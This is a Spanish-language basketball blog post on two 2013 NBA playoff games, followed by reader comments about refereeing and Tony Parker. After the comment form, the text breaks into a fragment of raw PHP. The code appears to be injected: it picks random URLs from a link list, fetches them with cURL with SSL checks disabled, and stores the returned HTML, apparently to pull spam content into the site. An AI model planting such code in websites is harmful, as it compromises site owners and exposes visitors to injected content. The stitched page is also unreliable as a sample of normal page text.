La Crónica: Statu Quo

11 de May de 2013 por MagicJohnson32

Eso es lo que hacen los grandes equipos, los veteranos, los más acostumbrados a vivir bajo presión. Llegan con la serie empatada a pista ajena, donde les espera un ambiente encendido y hostil, y ganan. Por partidos como los de anoche, Miami Heat y San Antonio Spurs representan el orden establecido, la lógica, el statu quo en los Playoffs 2013.

lebron mohammedAbrió la madrugada la victoria de los Heat en el United Center (104-94) ante unos Bulls que en ocasiones cruzaron la línea que separa la competitividad del juego sucio. A Tom Thibodeau no le gustó el arbitraje y con toda certeza recibirá una multa por insinuar que los Heat reciben un trato de favor, pero más le valdría rebajar un punto el nivel de agresividad de los suyos. Los Bulls están superando cualquier expectativa y no necesitan acciones como la del empujón de Mohammed a LeBron, y menos aún las acusaciones y la pose victimista.

Cuando Chicago y Miami se limitaron a jugar, volvimos a ver un excelente partido de baloncesto. Desde el salto inicial, los Bulls probaron que no iban a ser el equipo rendido del segundo encuentro de la serie. Ante el acierto de Boozer desde media distancia, los triples de Belinelli y el incansable trabajo de Noah y Butler, los Heat necesitaron al mejor Bosh posible y más. Wade parece muy limitado y LeBron no tenía su mejor día de cara al aro, así que tuvo que aparecer Norris Cole desde el banquillo para aportar una anotación crucial en la victoria de su equipo. Así, con unos Bulls exprimidos y unos Heat con margen de mejora, el partido llegó empatado (75-75) a los últimos 9 minutos. A partir de ahí, sólo mandaron los Heat, y aunque los Bulls jamás lanzaron la toalla, dos triples consecutivos de LeBron y Cole a menos de 2:00 para el final sentenciaron.

También recuperaron el factor cancha los Spurs, vencedores en Oakland (102-92) en un encuentro marcado por los ajustes tácticos de uno y otro técnico. Del duelo de banquillos salió claramente ganador, quién si no, Gregg Popovich, al que le funcionó de maravilla su decisión de poner a Danny Green sobre Stephen Curry. Mucho menos efectiva (y mucho más cuestionable) fue la propuesta de Mark Jackson de abandonar de entrada el small-ball y salir con Bogut y Ezeli en el quinteto y Draymond Green de vuelta al banquillo. Tony Parker y Tim Duncan dominaron el juego (especialmente espectacular estuvo el francés en la primera mitad), Green mantuvo a Curry bajo control y los Spurs sofocaron el intento de remontada local en el último cuarto, cuando los Warriors llegaron a ponerse a un punto (79-78) antes de encajar un parcial de 11-1. Por si los GSW no tenían suficiente con la derrota, Curry se lastimó de nuevo el tobillo y habrá que ver cómo evoluciona de cara al cuarto partido, que se disputará el domingo a las 21h30.

parker gsw

PREMIOS

MVP: Tras el primer partido comentábamos que los Heat necesitan de un gran Chris Bosh para avanzar ronda sin apuros. Ayer el ex-jugador de Toronto fue el mejor de su equipo con 20 puntos, 19 rebotes, 4 asistencias y 2 tapones. En SA fue de nuevo Tony Parker el que lideró a los suyos, esta vez con 32 puntos, 5 rebotes y 5 asistencias.

Rookie: Harrison Barnes anotó 12 puntos y capturó 8 rebotes. Correcta actuación de una de las piezas claves de los Warriors.

Sorpresa: Actuación casi perfecta de Norris Cole. 18 puntos en una serie de 6 de 7 en el tiro y 0 pérdidas en 24 minutos.

Decepción: Pocas posibilidades tienen los Warriors de ganar si Steph Curry no firma números mejores que el 5 de 17 en tiros de anoche.  Los Heat por su parte ganaron pese a que Dwyane Wade se quedó en 10 puntos.

Esfuerzo en vano: Joakim Noah ofreció su repertorio habitual de casta (15 puntos, 11 rebotes, 4 asistencias, 2 robos y 2 tapones) pero esta vez fue insuficiente para imponerse a los actuales campeones.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. rumbero dice:
    #1

    Lo de Parker en la primera parte fue un destrozo. Creo que sólo fallo un tiro y le pegó un buen meneo a Thompson. Y muy bien la defensa de Spurs permitiendo pocos triples y “mal” tirados, porque Green estuvo muy bien encima de Curry pero también Leonard sobre Klay. El tema es que aún así y varios tirones de +10 de los Spurs los Warriors se acercaban con un par de buenas acciones cada vez. Pero Pop estuvo muy atento al tema Bogut. Lo decía Lucho en otro post y si, es fundamental para los Warriors. Así que balones adentro, Tim que le saca la cuarta falta y toca banquillo. Y en cuanto vuelve y van arriba los Spurs que hacemos? Pues Hack-a-Bogut. 1/4 y al banquillo otra vez en cuestión de poco tiempo. Ahí ya murió el partido, con Curry en pista pero claramente cojeando (ay esos tobillos) y Jack haciendo unos últimos minutos malos de verdad. Esto sigue, a ver que sorpresitas tenemos para el cuarto.

      Citar

  2. Ruxixón dice:
    #2

    Lo cierto es que el arbitraje del partido de ayer Miami @ Chicago benefició al equipo de LeBron -cosa que en mi opinión no ocurrió en el polémico 2º partido de la serie del que tanto se quejan los seguidores de los Bulls- pero si hay un equipo al que le interese llevar todo el juego en esa dirección son los Bulls,así que como dice Magic en la crónica,que no vayan de víctimas,que las faltas más feas son de Noah & cia.Y Noah podía llevarse 2 técnicas por partido fácil.Que conste que no me parece mal llevar el partido a las trincheras,porque con la escasez de efectivos que tienen es su única posibilidad,pero la agresividad debe ser llevada hasta cierto límite.Y desde luego que salgan quejándose de algo que provocan es de una actitud un poco…al estilo de la serie.Quedan mínimo 2 partidos más así que se seguirán viendo acciones polémicas (apuesto a que Gibson hace alguna,está hiperexcitado).

      Citar

  3. HisRoyalAirness dice:
    #3

    Tony Parker, ese base tan mediocre y tan inferior EN TODO a CP3. Me da la risa. Y sé que no va a estar en el primer quinteto pero me parece un asco.

    Y estoy de acuerdo en lo del arbitraje, siempre es la misma historia. La segunda falta de Buttler no es, con lo que eso implica, y no dejo de ver bloqueos ilegales de Lebron y faltas que nunca le pitan. Y a Mohammed se le va la olla, de acuerdo, pero es Lebron el primero que suelta el brazo (y Joey Crawford le pita técnica) y el empujón no es para tanto porque James se deja caer al suelo como ese buen “flopper” que es, sino era doble técnica y adiós.

    Por cierto, lo que debiera de ser flagrant two es un mate que hace Bogut y se le cuelga a Duncan de la espalda en plan soy un vacilón. Cretino.

    Y casi lloro con el Tapón de Robinson a LJ

      Citar

  4. MagicJohnson32 dice:
    #4

    HisRoyalAirness:
    Tony Parker, ese base tan mediocre y tan inferior EN TODO a CP3. Me da la risa. Y sé que no va a estar en el primer quinteto pero me parece un asco.

    Nadie ha dicho, me parece, que Parker sea mediocre ¿no? Dudo que haya un blog en todo el planeta en el que se diga con mayor frecuencia que TP está infravalorado. Bueno, supongo que en los blogs franceses y de los Spurs lo dicen más, pero sólo ésos 😀

      Citar

  5. HisRoyalAirness dice:
    #5

    MagicJohnson32: Nadie ha dicho, me parece, que Parker sea mediocre ¿no? Dudo que haya un blog en todo el planeta en el que se diga con mayor frecuencia que TP está infravalorado. Bueno, supongo que en los blogs franceses y de los Spurs lo dicen más, pero sólo ésos

    Joder, ayer decían que era inferior en todo a Chris Paul. Hay gente con status All-Star permanente porque sí adorados por la NBA. Si Chris Paul mete 9 puntos contra los Grizzlies? Su equipo no materializaba. Si Mike Conley hace un 25-12? Conley muy acertado (de la defensa ni hablamos). Es un líder increíble! Pero no se come una mierda con una gran plantilla.

    Me parece un crack pero es que Parker, a la chita callando, hace números similares e incluso superiores y no, al segundo o tercer quinteto y no es top 3 de bases

      Citar

  6. Sancho88 dice:
    #6

    HisRoyalAirness:
    Tony Parker, ese base tan mediocre y tan inferior EN TODO a CP3. Me da la risa. Y sé que no va a estar en el primer quinteto pero me parece un asco.

    Y estoy de acuerdo en lo del arbitraje, siempre es la misma historia. La segunda falta de Buttler no es, con lo que eso implica, y no dejo de ver bloqueos ilegales de Lebron y faltas que nunca le pitan. Y a Mohammed se le va la olla, de acuerdo, pero es Lebron el primero que suelta el brazo (y Joey Crawford le pita técnica) y el empujón no es para tanto porque James se deja caer al suelo como ese buen “flopper” que es, sino era doble técnica y adiós.

    Por cierto, lo que debiera de ser flagrant two es un mate que hace Bogut y se le cuelga a Duncan de la espalda en plan soy un vacilón. Cretino.

    Y casi lloro con el Tapón de Robinson a LJ

    Vale que odies a Lebron HisRoyal, eso lo sabemos todos, pero Lebron no es el primero que suelta el codo. Mohamed lo abraza sin sentido y Lebron solo suelta para quitárselo de encima. El no provoca. Hay que ser realistas, vale que alguna faltilla no fuera, como una de Noah sobre Bosh si mal no recuerdo, alguna de Jimmy Butler como bien has dicho, un 3+1 que no le pitan a Bellinelli, pero la expulsión de Mohamed es totalmente justa, no la provoca Lebron y el arbitraje, en general, no tuvo nada que ver en la derrota de los Bulls. Símplemente, tenían menos rotación, aguantaron hasta el tercer cuarto (que no es poco) y al final ya no podían ni respirar. En el último cuarto dejan acciones que no se pueden permitir en los últimos minutos. Llegaron asfixiados. Si es por problemas de faltas… no sé yo. Muchas veces las faltas son consecuencia del cansancio. Fíjate que la mayoría de veces que arranca Lebron al final nadie lo puede parar y salen brazos por todos lados para pararlo. Eso, obviamente, son personales.

    Realmente, Miami no jugó tan bien, solo hicieron su trabajo. Con Deng y Rose estos Bulls estarían 2-1 probablemente, pero ahora están desfondados. Marquis Teague no vale ni para dar rotaciones de 5 minutos en este momento de su carrera. Está muy verde y deberían haber sacado a DeQuan Cook, que al menos tiene más experiencia. Y, después, la bobada de Mohamed les cuesta cara a los Bulls, que se ven con problemas de faltas de Boozer, Noah no tiene recambios, y acaban siendo dominados por Chris Andersen en el último cuarto… Miami simplemente gana con tiros fáciles desde fuera, nadie deifende a Bosh como dios manda para que no reciba fácil, y la derrota se produce por cansancio. Son los Bulls, y no los Heat, los que llevan estos partidos a la gresca. Como bien decis, son sus únicas opciones. De hecho, si mal no recuerdo, ayer Noah y Mohamed fueron los que primero calentaron la sartén. Aún así, chapó por este temporadón de los Bulls. Para mí, sobresaliente

      Citar

  7. MagicJohnson32 dice:
    #7

    HisRoyalAirness: Joder, ayer decían que era inferior en todo a Chris Paul. Hay gente con status All-Star permanente porque sí adorados por la NBA. Si Chris Paul mete 9 puntos contra los Grizzlies? Su equipo no materializaba. Si Mike Conley hace un 25-12? Conley muy acertado (de la defensa ni hablamos). Es un líder increíble! Pero no se come una mierda con una gran plantilla.

    Me parece un crack pero es que Parker, a la chita callando, hace números similares e incluso superiores y no, al segundo o tercer quinteto y no es top 3 de bases

    Si a mí no me tienes que convencer, me encanta Parker, siempre lo digo. Pero tampoco creo que sea tan grave pensar que Chris Paul es superior. ¿Está en el Top 3 de bases? Esta temporada, sin duda. Pero piensa en la competencia: Rose, Rondo, Deron, Curry, Westbrook… Entiendo que, como mínimo, hay lugar para el debate.

      Citar

  8. Sancho88 dice:
    #8

    Y Norris Cole 8/8 en triples en los últimos dos partidos. Espectacular. Supongo que el año que viene saldrá ya de titular. Que no se extrañe Chalmers, porque Cole es mejor jugador que él

      Citar

  9. HisRoyalAirness dice:
    #9

    Sancho que yo no odio a Lebron, para mí es el mejor jugador de la liga con diferencia pero digo que se tira. Y si no fuese así sería técnica.
    No defiendo según que suciedades ni creo que los Bulls estén por debajo por los árbitros pero, aún así, son cosas que yo veo continuamente y no me gustan (como también las veo a favor de los Lakers, eh?).

    Magic y lo de Curry está muy bien pero top 3 ni de broma, ni top 5. Los PO están siendo un escándalo pero no es mejor que Paul, Parker, Westbrook, Rose ni Rondo. Para mí al menos

      Citar

  10. MagicJohnson32 dice:
    #10

    Pero ¿qué significa ser Top 3? ¿Hablamos de cualidades? Entonces Parker tampoco es Top 3. ¿Hablamos de rendimiento durante una temporada? ¿Los últimos tres años? ¿El último mes? ¿El último partido? Curry es tal vez el MVP de lo que llevamos de Playoffs, así que…

    En fin, a mí ni siquiera me gustan los ‘tops’, jeje.

      Citar

  11. GreenPride dice:
    #11

    Pues vuelta al orden establecido en ambas eliminatorias.
    En Chicago hay que rendirse al espíritu agresivo y luchador de los Bulls. No nos engañemos, los Bulls tienen que jugar al límite y por encima incluso si quieren tener alguna opción en los partidos y aún así casi seguro que los acabarán perdiendo.
    Por Miami preocupa la bajísima forma de Wade. Parece que físicamente está bastante mal y le pueden echar en falta cuando las cosas estén más igualadas que en esta serie. Con Flash así de mal hay que felicitar a los Bulls por su defensa a LeBron. Verdaderamente le están poniendo muy difíciles las cosas aunque el Rey siempre acaba apañándoselas para tener buenos números no está pudiendo ser tan decisivo como otras veces. Esta vez necesitó de un enorme Norris Cole y de un gran partido bajo los aros de Bosh (esta vez sí) para acabar con el partido. Ahora a los Bulls sólo les queda seguir muriendo en cada partido y dar la cara como lo están haciendo aunque al final no sé si lograrán alguna victoria más.
    En la otra eliminatoria los Spurs pusieron sus galones en pista para enfriar a los Warriors y darles una lección. Un gran Parker esta vez superó claramente a sus pares en ataque y marcó el ritmo. Eso unido a la defensa de los del Álamo sobre los tiradores Warriors y a que estos no tuvieron su día del todo en el tiro les dió una victoria que se antoja crucial en la serie, tanto como el estado de los tobillos de Curry esta vez asfixiado por la defensa de Green. Ahora el cuarto será a vida o muerte para Golden State y Curry, Thompson y Jack deben recuperar el feeling en ataque o la serie puede quedar vista para sentencia. Los imparciales como yo esperamos que así sea y que la serie sea tan larga como aparentaba ser.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>